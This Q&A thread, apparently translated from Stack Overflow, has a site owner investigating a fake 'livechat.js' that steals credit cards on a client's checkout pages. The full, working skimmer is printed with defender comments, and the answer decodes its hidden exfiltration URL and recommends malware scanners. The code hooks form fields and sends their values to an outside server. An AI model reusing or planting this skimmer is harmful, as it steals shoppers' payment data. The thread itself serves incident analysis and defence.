我客户的网站上有顾客的信用卡信息被盗。我发现网站上运行着一个名为 livechat.js 的脚本,但该网站并没有实时聊天功能,因此我认为它可能是恶意软件。我该如何查明这个脚本的来源(它是从哪里被加载或注入的),以及它的确切功能?
https://www.hergbenet.ro/wp-data/livechat.js
// Encoder helper: returns the Base64 form of the UTF-8 bytes of string `e`.
// encodeURIComponent() percent-escapes the text, every %XX escape is converted
// back into a single character, and btoa() Base64-encodes the result.
// Analyst note: this is a reversible encoding, not encryption. aQwCiGbwKo() in
// this listing runs its JSON payload through this function before putting it in
// the "image_id" query parameter, so values seen in proxy or web-server logs can
// be decoded to learn which form fields were captured.
function IrDvbNXumt(e) {
return btoa(encodeURIComponent(e).replace(/%([0-9A-F]{2})/g, function(e, t) {
return String.fromCharCode(parseInt(t, 16))
}))
}
// Hooks every form control on the page: for each <input>, <select> and <textarea>
// it writes an inline "onchange" attribute that calls SAcSpFtVQg(this, <kind>),
// where the kind string is '0' for inputs, '1' for selects and '2' for textareas.
// If the element already has an onchange attribute that does not mention
// SAcSpFtVQg, the call is prepended so the site's own handler still runs.
// The window.onload handler in this listing re-runs this function on a timer, so
// fields added to the page later are hooked as well.
// Detection note: "onchange" attributes containing "SAcSpFtVQg" are a DOM-level
// indicator of this script. These are inline event handlers, which a
// Content-Security-Policy without 'unsafe-inline' would normally refuse to run.
function lmVibHTBLP() {
// <input> elements of any type (no type filter is applied).
Array.from(document.getElementsByTagName("input")).forEach(function(e, t) {
null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this, '0')") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '0');" + e.getAttribute("onchange"))
// <select> elements.
}), Array.from(document.getElementsByTagName("select")).forEach(function(e, t) {
null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this, '1');") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '1');" + e.getAttribute("onchange"))
// <textarea> elements. The attribute string written when no handler exists is
// spelled differently from the other two cases; SAcSpFtVQg only tests its second
// argument against "1", so the textarea still goes through the non-select path.
}), Array.from(document.getElementsByTagName("textarea")).forEach(function(e, t) {
null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this), '2'") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '2');" + e.getAttribute("onchange"))
})
}
// Per-field capture handler, invoked from the "onchange" attributes that
// lmVibHTBLP() writes onto form controls.
//   e - the form element that changed
//   t - kind string; only the value "1" (select) is treated specially
// Builds a list starting with "url%<page hostname>" and "type:2", appends one
// "<name or id>%<value>" entry for the element (the id is used when the name is
// empty), and hands the list to aQwCiGbwKo() for sending.
//  - t != "1": the entry is added and sent only when the value is non-empty.
//  - t == "1": a select whose id or name matches zone|region|state and whose
//    value is non-empty contributes the visible text of the selected option;
//    any other select contributes its raw value. Both cases are sent.
// The e.value.replace(...) expression has no effect: its result is discarded.
function SAcSpFtVQg(e, t) {
var n = [];
n.push("url%" + location.hostname), n.push("type:2"), "1" != t ? e.value.length > 0 && (0 == e.name.length ? n.push(e.id + "%" + e.value) : 0 != e.name.length && n.push(e.name + "%" + e.value), aQwCiGbwKo(n)) : e.value.length > 0 && (-1 != e.id.search("zone|region|state") || -1 != e.name.search("zone|region|state")) ? (e.value.replace(/[^-0-9]/gim, ""), e.value, 0 == e.name.length ? n.push(e.id + "%" + e.options[e.selectedIndex].text) : 0 != e.name.length && n.push(e.name + "%" + e.options[e.selectedIndex].text), aQwCiGbwKo(n)) : (0 == e.name.length ? n.push(e.id + "%" + e.value) : 0 != e.name.length && n.push(e.name + "%" + e.value), aQwCiGbwKo(n))
}
// Exfiltration routine: sends the captured field list `e` to a third-party
// server by requesting an image whose URL carries the data.
// Returns false without sending when `e` serialises to the same JSON as the
// previously sent list (kept in the global KZgKcnPvnh); otherwise returns nothing.
// The destination is hidden as a Base64 literal; the answer on this page decodes
// it to https://valdamarkdirect.com/wp-data/validation.php.
// Defender notes:
//  - The data leaves the browser as a GET request, so it appears in proxy, DNS and
//    egress logs as requests to that host with an "image_id" query parameter.
//  - A Content-Security-Policy img-src allow-list that omits that host would be
//    expected to block this request; verify against the site's actual policy.
function aQwCiGbwKo(e) {
// De-duplicate: skip the request if nothing changed since the last send.
if (JSON.stringify(KZgKcnPvnh) == JSON.stringify(e)) return !1;
KZgKcnPvnh = e;
// t: random number used as the id of the temporary <img>; n: JSON payload.
var t = 89999 * Math.random() + 1e4,
n = JSON.stringify(e),
a = document.createElement("img");
// Setting src starts the request; the payload is the Base64 output of
// IrDvbNXumt(). Note that remove() is called right away and its return value,
// not a callback, is what setTimeout receives, so the <img> does not stay in the
// DOM for inspection. Look for this activity in network logs rather than the DOM.
a.width = "1px", a.height = "1px", a.id = t, a.src = atob("aHR0cHM6Ly92YWxkYW1hcmtkaXJlY3QuY29tL3dwLWRhdGEvdmFsaWRhdGlvbi5waHA=") + "?image_id=" + IrDvbNXumt(n), document.body.appendChild(a), setTimeout(document.getElementById(t).remove(), 3e3)
}
// Whole-page capture: gathers the current values of all form controls and sends
// them in one list through aQwCiGbwKo().
// The list starts with "url%<page hostname>" and "type%2", followed by one
// "<name or id>%<value>" entry per element (the id is used when the name is empty):
//  - every <input> with a non-empty value, regardless of its type, which
//    includes payment-card, password and hidden fields if the page has them;
//  - every <select>: the visible option text for fields whose id or name matches
//    zone|region|state and whose value is non-empty, otherwise the raw value;
//  - every <textarea> with a non-empty value.
// The t.value.replace(...) expression has no effect: its result is discarded.
function Default_Send() {
var e = [];
e.push("url%" + location.hostname), e.push("type%2"), Array.from(document.getElementsByTagName("input")).forEach(function(t, n) {
t.value.length > 0 && (0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value))
}), Array.from(document.getElementsByTagName("select")).forEach(function(t, n) {
t.value.length > 0 && (-1 != t.id.search("zone|region|state") || -1 != t.name.search("zone|region|state")) ? (t.value.replace(/[^-0-9]/gim, ""), t.value, 0 == t.name.length ? e.push(t.id + "%" + t.options[t.selectedIndex].text) : 0 != t.name.length && e.push(t.name + "%" + t.options[t.selectedIndex].text)) : 0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value)
}), Array.from(document.getElementsByTagName("textarea")).forEach(function(t, n) {
t.value.length > 0 && (0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value))
// Send the collected list; aQwCiGbwKo() drops it if identical to the last one.
}), aQwCiGbwKo(e)
}
// Last payload handed to aQwCiGbwKo(); used there to suppress duplicate sends.
var KZgKcnPvnh = [];
// Entry point. Assigning window.onload replaces any handler the site had set
// through the same property. The script stays idle unless the page URL contains
// "checkout"; on such pages it captures all fields once, repeats that capture
// every 3000 ms, and re-hooks form controls every 1500 ms.
// Defender notes: the timers are given code as strings, which a
// Content-Security-Policy without 'unsafe-eval' would normally block. Because
// activity is limited to checkout URLs, scans of other pages will not show the
// outbound requests; test the checkout flow itself.
window.onload = function() {
-1 != location.href.search("checkout") && (Default_Send(), setInterval("Default_Send()", 3e3), setInterval("lmVibHTBLP()", 1500))
};
答案 0 :(得分:0)
您应该安装并运行Wordfence Security – Firewall & Malware Scan或Sucuri Security – Auditing, Malware Scanner and Security Hardening并检查结果。
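例如,如果您对脚本中的 atob("aHR0cHM6Ly92YWxkYW1hcmtkaXJlY3QuY29tL3dwLWRhdGEvdmFsaWRhdGlvbi5waHA=")
进行解码,就会得到这个URL:https://valdamarkdirect.com/wp-data/validation.php。脚本只在地址包含 checkout 的页面上运行,它会收集表单字段(input、select、textarea)的值,经 Base64 编码后作为 image_id 参数附加到该URL,并以图片请求的形式发送出去。这个域名是您认识的吗?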
在大多数情况下,您应该首先告知客户该网店已被入侵,然后寻求专业人员的帮助。